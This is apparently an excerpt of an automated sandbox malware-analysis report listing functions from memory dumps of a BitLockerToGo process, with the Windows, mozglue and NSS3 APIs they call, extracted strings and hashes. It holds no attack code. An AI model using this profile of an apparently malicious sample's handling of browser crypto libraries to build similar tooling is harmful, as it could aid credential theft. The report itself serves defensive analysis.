                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C9A1770
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9A1A3E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: memset$freemallocmemcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3693777188-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 92036368fa7523b14ecbea7aa9c95b3c11189d0ba2ff010721e370e1eda55bee
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5d84953e26e5b7725760a09afb567eddfb6ef494f835275c97605b279bd6f380
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92036368fa7523b14ecbea7aa9c95b3c11189d0ba2ff010721e370e1eda55bee
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45B30A71E0421ACFCB14CFA9C890AADF7B2BF49304F1981A9D459AB755D730E986CF90
                                                                                                                                                                                                                                                                                                                    Function 6CA1ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA1ED0A
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA1EE68
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA1EF87
                                                                                                                                                                                                                                                                                                                    • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CA1EF98
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • database corruption, xrefs: 6CA1F48D
                                                                                                                                                                                                                                                                                                                    • %s at line %d of [%.10s], xrefs: 6CA1F492
                                                                                                                                                                                                                                                                                                                    • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA1F483
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                                                                                    • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                    • API String ID: 4101233201-598938438
                                                                                                                                                                                                                                                                                                                    • Opcode ID: faa27704279845fb437324faa9b73ee2efddbc9c5699c7686301d936fb352901
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 01a395191523c19a16a70c99783452429b59906f169996839c87e8a58edbc71b
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: faa27704279845fb437324faa9b73ee2efddbc9c5699c7686301d936fb352901
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3662E174A082858FDB04CF69C884B9ABBB1BF45328F1C419DD8565BF92D735E8C6CB90
                                                                                                                                                                                                                                                                                                                    Function 6C99D4D0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 251COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D4F2
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D50B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: EnterCriticalSection.KERNEL32(6C9FE784), ref: 6C97CFF6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C97CFE0: LeaveCriticalSection.KERNEL32(6C9FE784), ref: 6C97D026
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D52E
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FE7DC), ref: 6C99D690
                                                                                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C99D6A6
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE7DC), ref: 6C99D712
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FE784,?,?,?,?,?,?,?,00000000,75572FE0,00000001,?,6C9AD1C5), ref: 6C99D751
                                                                                                                                                                                                                                                                                                                    • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C99D7EA
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$Leave$Enter$K@1@Maybe@_RandomUint64@mozilla@@$CountInitializeSpin
                                                                                                                                                                                                                                                                                                                    • String ID: : (malloc) Error initializing arena$<jemalloc>
                                                                                                                                                                                                                                                                                                                    • API String ID: 2690322072-3894294050
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e409147fc92ae23b6c69196b78f85c8e0483bc2ab22532a4bdd9eac1aefa8d6
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 37ad5fdb8974b1c8bcd2685082187e2c9ccaac3afb0062a5b2c1744377bc94b9
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e409147fc92ae23b6c69196b78f85c8e0483bc2ab22532a4bdd9eac1aefa8d6
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3291B572A087418FD714CF29C4D072AB7E5FB99718F28892ED56AC7B85D730E845CB82
                                                                                                                                                                                                                                                                                                                    Function 6CAC0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PK11_PubDeriveWithKDF.NSS3 ref: 6CAC0F8D
                                                                                                                                                                                                                                                                                                                    • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAC0FB3
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6CAC1006
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(?), ref: 6CAC101C
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CAC1033
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAC103F
                                                                                                                                                                                                                                                                                                                    • PK11_FreeSymKey.NSS3(00000000), ref: 6CAC1048
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CAC108E
                                                                                                                                                                                                                                                                                                                    • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CAC10BB
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,00000006,?), ref: 6CAC10D6
                                                                                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6CAC112E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6CAC08C4,?,?), ref: 6CAC15B8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6CAC08C4,?,?), ref: 6CAC15C1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC162E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAC1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC1637
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1510409361-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 78915ef522ec29d19d8e3fe71fc0461eddc40dab64e2551ed60e67c7562c2274
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 81e37c11e69b37abc4942c0a7dd9eca55136e22a247518f4d243eadbb6c7655d
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 78915ef522ec29d19d8e3fe71fc0461eddc40dab64e2551ed60e67c7562c2274
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1071C0B1B002458FDB04CFA5DD84A6AB7F0FF48318F18862DEA1997711E731D989CB92
                                                                                                                                                                                                                                                                                                                    Function 6CAE6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C3F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB3C2BF
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C60
                                                                                                                                                                                                                                                                                                                    • PR_ExplodeTime.NSS3(00000000,6CA91C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CA91C6F,00000000,00000004,?,?), ref: 6CAE6C94
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                                                                                    • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                                                                                    • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                                                                                    • Opcode ID: a3294229888181108d6d27e9779954bc83be35e8eceaaebad79881d2c0520bd0
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7d049e565a34465fcae1cacda9f078fe0dc481691af6e22d9f85e84a02c1f891
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3294229888181108d6d27e9779954bc83be35e8eceaaebad79881d2c0520bd0
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 64513A72B016494FC708CDADDC927DEB7DAABA8310F48C23AE442DB781D638D946C791
                                                                                                                                                                                                                                                                                                                    Function 6CA2AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31,?,?,?,?,?,?,?), ref: 6CA2B039
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31), ref: 6CA2B090
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?,?,?,?,?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31), ref: 6CA2B0A2
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31,?,?,?,?,?,?,?,?,?), ref: 6CA2B100
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?,?,00000002,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31,?,?,?,?,?,?,?), ref: 6CA2B115
                                                                                                                                                                                                                                                                                                                    • sqlite3_free.NSS3(?,?,?,?,?,?,6CB4CF46,?,6CA1CDBD,?,6CB4BF31), ref: 6CA2B12D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA19EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA2C6FD,?,?,?,?,6CA7F965,00000000), ref: 6CA19F0E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA19EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CA7F965,00000000), ref: 6CA19F5D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3155957115-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: f8bd630076e0cf1f6736fd070bd06d3a453a1f12beefc448c33320f852181331
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8ec4c7d15187a565c9e48f6f9190646f98c7649e46d722c00c9d43282c9003ea
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8bd630076e0cf1f6736fd070bd06d3a453a1f12beefc448c33320f852181331
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F691E1B0A042158FDB14CF39D984A6BB7B6FF45304F1C462DE41697B50EB38E884CB51
                                                                                                                                                                                                                                                                                                                    Function 6CBA8D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_CallOnce.NSS3(6CBF14E4,6CB5CC70), ref: 6CBA8D47
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CBA8D98
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA80F00: PR_GetPageSize.NSS3(6CA80936,FFFFE8AE,?,6CA116B7,00000000,?,6CA80936,00000000,?,6CA1204A), ref: 6CA80F1B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA80F00: PR_NewLogModule.NSS3(clock,6CA80936,FFFFE8AE,?,6CA116B7,00000000,?,6CA80936,00000000,?,6CA1204A), ref: 6CA80F25
                                                                                                                                                                                                                                                                                                                    • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6CBA8E7B
                                                                                                                                                                                                                                                                                                                    • htons.WSOCK32(?), ref: 6CBA8EDB
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CBA8F99
                                                                                                                                                                                                                                                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CBA910A
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                                                                                                                    • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                                                                                                                    • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 5614f67b7e13cf9858bffcaf70f50f7c563752c9f6498775dfb4638ef8c19306
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 463e200f76c08d3e2d787a5cdb6731494da61c78cd0ce8f211f755c53ffdd05f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5614f67b7e13cf9858bffcaf70f50f7c563752c9f6498775dfb4638ef8c19306
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D029931D092D19FEB188F59C46876ABBB2EF42304F19825ED8D15FA91C333D94AC791
                                                                                                                                                                                                                                                                                                                    Function 6C9C2C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C9C2C31
                                                                                                                                                                                                                                                                                                                    • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C9C2C61
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C974DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C974E5A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C974DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C974E97
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C9C2C82
                                                                                                                                                                                                                                                                                                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9C2E2D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C9881B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C9881DE
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
                                                                                                                                                                                                                                                                                                                    • String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
                                                                                                                                                                                                                                                                                                                    • API String ID: 801438305-4149320968
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b4e14fb4577b83a9adc3f23fd28114c57ad02fd4cf39307c2c127b5394ec18c7
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 2c03f5f22c86f92878916e7a8afef1dfde98ef5ba92554c581aa58ef93a9bff8
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4e14fb4577b83a9adc3f23fd28114c57ad02fd4cf39307c2c127b5394ec18c7
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9191ACB0608B808FC724CF24C49469EB7E5AFE9358F10491DE59A9B791DB30D949CB53
                                                                                                                                                                                                                                                                                                                    Function 6C97D4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                    • String ID: $-$0$0$1$8$9$@
                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3654031807
